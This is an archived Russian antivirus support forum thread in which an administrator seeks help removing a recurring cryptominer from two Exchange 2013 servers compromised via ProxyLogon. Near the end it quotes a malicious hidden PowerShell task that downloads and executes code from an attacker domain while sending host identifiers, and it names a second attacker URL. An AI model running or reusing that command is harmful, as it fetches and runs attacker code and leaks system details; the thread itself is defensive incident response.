Дорогие участники форума!

Наш форум переведен в режим работы "только для чтения", публикация новых тем и сообщений недоступна. Мы искренне благодарны вам за то, что были с нами, но пришло время двигаться дальше. После официального ухода компании ESET с российского рынка мы приступили к разработке новых продуктов вместе с новыми партнёрами. Приглашаем вас присоединиться к нашему новому форуму PRO32.

Мы более не являемся эксклюзивным дистрибьютором программных продуктов словацкого разработчика ESET в России, Республике Беларусь, Казахстане, Азербайджане, Узбекистане, Кыргызстане, Таджикистане, Туркменистане, Молдове, Грузии и Армении.

Купить и продлить лицензии ESET на нашем сайте больше нельзя.

Предлагаем вам попробовать новые продукты компании PRO32.

PRO32 — это технологичные решения, надежная защита от киберугроз и максимальная производительность устройств. Для действующих клиентов ESET мы предлагаем промокод на скидку в размере 15% — ESET15. Скопируйте его и после добавления товара в корзину, не забудьте его применить в корзине.

Выбрать дату в календареВыбрать дату в календаре

[ Закрыто] запуск майнера на серверах с MS Exchange 2013
На обоих серверах запускается. Но мы так же смотрим про ПроксиЛогон уязвимость, и пытаемся исправить всякими скриптами повершела и т.п. Но зараза запускается снова и снова. Иногда, очень редко, запускается на одном из двух серверов, а на втором нет. У меня вообще подозрения что команда запуска идет из вне, т.е. доступ запуска всё еще остался некий доступ. Хоть мы и поставили все обновления, заплатки от майкрософта.
Очень правильно что посоветовали программу для слежки, конечно же сейчас сделаю. У меня как раз был этот вопрос.
Скрипты сделал на двух серверах.  
[ Закрыто] запуск майнера на серверах с MS Exchange 2013
пришлите карантин этих файлов прислать в почту [email protected] в архиве с паролем infected
Можете рассказать как это делать в малвербайте? Отчет нашел как отправить, а сам карантин не вижу где это делается в программе. На сайте нашел только это https://forum.esetnod32.ru/forum9/topic10688/
Пока не скрипт не выполнял.
Сегодня снова майнингИ были. Сделал образ двух дисков. Отправляю.
Изменено: Владимир Шариков - 30.07.2021 11:01:38
[ Закрыто] запуск майнера на серверах с MS Exchange 2013
В общем самодеятельность моего начальника привела к тому что, он самостоятельно, без моего ведома, запустил Малвербайт на этих серверах.
Правда это дало результат, сегодня всё в нормальном состоянии... Скинул на всякий случай отчет из него. Но зараза возможно что снова прилетит?  
[ Закрыто] запуск майнера на серверах с MS Exchange 2013
Эх!!! Только закрыл процесс на двух серверах, т.к. люди работать не могут, после прочитал... Запускается в 2:30 каждый день, как самостоятельно его запустить не знаю, завтра утром сделаю. Можно время перевести вперед попытаться, но боюсь что на экчандже проблемы будут.
[ Закрыто] запуск майнера на серверах с MS Exchange 2013
Здравствуйте.
Собственно снова вирусы на двух MS Exchange 2013. В скриншоте показал строку c бякой.
Файл WACS.EXE нормальный, используется для сертификатов ssl.
Помогите отыскать заразу.
[ Закрыто] запуск майнера на серверах с MS Exchange 2013, ProxyLogon
Цитата
santy написал:
если будет возможность перегрузить сервера,
выполните в uVS вначале твик 39, потом перегрузить систему, потом еще раз снять в uVS образы автозапуска, для проверки,
возможно получиться увидеть, кто  эти задачи создает.
(при условии, конечно, если они будут воссозданы)
твик 39 что то найти не могу, найду.
Еще вопрос. По той же проблеме. После этой бяки вот такое вылетает у пользователей (см. скриншот)
Изменено: Владимир Шариков - 17.03.2021 18:17:11
[ Закрыто] запуск майнера на серверах с MS Exchange 2013, ProxyLogon
Цитата
santy написал:
Цитата
 Владимир  Шариков  написал:
Цитата
 santy  написал:
Цитата
 Владимир  Шариков  написал:
Положу сюда сразу два образа двух серверов.
можно и второй образ положить
по второму серверу:
это нормальный софт?
C:\PROGRAM FILES\WIN-ACME\WACS.EXE
--RENEW --BASEURI "HTTPS://ACME-V02.API.LETSENCRYPT.ORG/"
Да, это сертификаты обновляет.  
[ Закрыто] запуск майнера на серверах с MS Exchange 2013, ProxyLogon
Цитата
santy написал:
Цитата
 Владимир  Шариков  написал:
Положу сюда сразу два образа двух серверов.
можно и второй образ положить
[ Закрыто] запуск майнера на серверах с MS Exchange 2013, ProxyLogon
Цитата
santy написал:
сервер можно будет перегрузить (скриптом)?
Через пол часа можно будет.
Цитата
santy написал:
Цитата
 Владимир  Шариков  написал:
Что этот код делает? Стоит ли боятся "Последствий" этой бяки?
шифрованный код. понятно, что расшифровывается на вашей системе, или наоборот в зашифрованном виде уходит в сеть
Как его возможно расшифровать? Нужно понять что хакер хотел добиться. Как мы поняли хекер воспользовался уявимостью, при обращение к екчанджу происходит срабатывания нескольких скриптов (каких мы не знаем). Но заметили что меняются ДНСы сервера.
Цитата
santy написал:
есть задачи, через которые возможно пытаются перехватить пароли.
Цитата
C:\WINDOWS\SYSTEM32\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE
-W HIDDEN -C I`EX ([SYSTEM.TEXT.ENCODING]::ASCII.GETSTRING((NEW-OBJECT NET.WEBCLIENT).DOWNLOADDATA('HTTP://'+'DOWN.'+'SQLNETCAT.COM/A.JSP?_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT WIN32_COMPUTERSYSTEMPRODUCT).UUID,(RANDOM))-JOIN'*'))))
Вот это слово "Возможно" пугает ))) Тут как я понимаю срабатывает Имя ПК, Индефикатор, и имя пользователя.
[ Закрыто] запуск майнера на серверах с MS Exchange 2013, ProxyLogon
Вот это не ясно http://t.netcatkit.com/a.jsp?_20210317? :
Скрытый текст
Что этот код делает? Стоит ли боятся "Последствий" этой бяки?